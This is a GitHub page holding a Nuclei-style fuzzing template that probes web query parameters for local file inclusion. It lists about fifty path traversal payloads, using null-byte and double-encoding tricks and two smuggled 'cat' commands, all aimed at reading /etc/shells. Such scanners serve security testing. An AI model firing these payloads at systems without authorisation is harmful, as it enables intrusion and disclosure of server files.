-
Notifications
You must be signed in to change notification settings - Fork 25
/
Copy path0xlfifuzz.yaml
79 lines (74 loc) · 3.08 KB
/
0xlfifuzz.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
id: lfi-fuzz
info:
name: Local File Inclusion
author: 0x71rex
severity: high
tags: lfi,dast,linux
http:
- method: GET
path:
- '{{BaseURL}}'
payloads:
nix_fuzz:
- '/etc/shells'
- '../../etc/shells'
- '../../../etc/shells'
- '/../../../../etc/shells'
- '../../../../../../../../../etc/shells'
- '../../../../../../../../etc/shells'
- '../../../../../../../etc/shells'
- '../../../../../../etc/shells'
- '../../../../../etc/shells'
- '../../../../etc/shells'
- '../../../etc/shells'
- '../../../etc/shells%00'
- '../../../../../../../../../../../../etc/shells%00'
- '../../../../../../../../../../../../etc/shells'
- '/../../../../../../../../../../etc/shells^^'
- '/../../../../../../../../../../etc/shells'
- '/./././././././././././etc/shells'
- '\..\..\..\..\..\..\..\..\..\..\etc\shells'
- '..\..\..\..\..\..\..\..\..\..\etc\shells'
- '/..\../..\../..\../..\../..\../..\../etc/shells'
- '.\\./.\\./.\\./.\\./.\\./.\\./etc/shells'
- '\..\..\..\..\..\..\..\..\..\..\etc\shells%00'
- '..\..\..\..\..\..\..\..\..\..\etc\shells%00'
- '%252e%252e%252fetc%252fshells'
- '%252e%252e%252fetc%252fshells%00'
- '%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/shells'
- '%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/shells%00'
- '....//....//etc/shells'
- '..///////..////..//////etc/shells'
- '/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/shells'
- '%0a/bin/cat%20/etc/shells'
- '%00/etc/shells%00'
- '%00../../../../../../etc/shells'
- '/../../../../../../../../../../../etc/shells%00.jpg'
- '/../../../../../../../../../../../etc/shells%00.html'
- '/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shells'
- '/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shells'
- '\\'/bin/cat%20/etc/shells\\''
- '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/shells'
- '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shells'
- '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shells'
- '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shells'
- '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/shells'
- '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/shells'
- '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/shells'
- '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/shells'
fuzzing:
- part: query
type: replace # replaces existing parameter value with fuzz payload
mode: multiple # replaces all parameters value with fuzz payload
fuzz:
- '{{nix_fuzz}}'
stop-at-first-match: true
matchers:
- type: word
words:
- "# valid login shells"
- "/bin/sh"
- "/bin/ash"
- "/bin/bash"
condition: and
part: body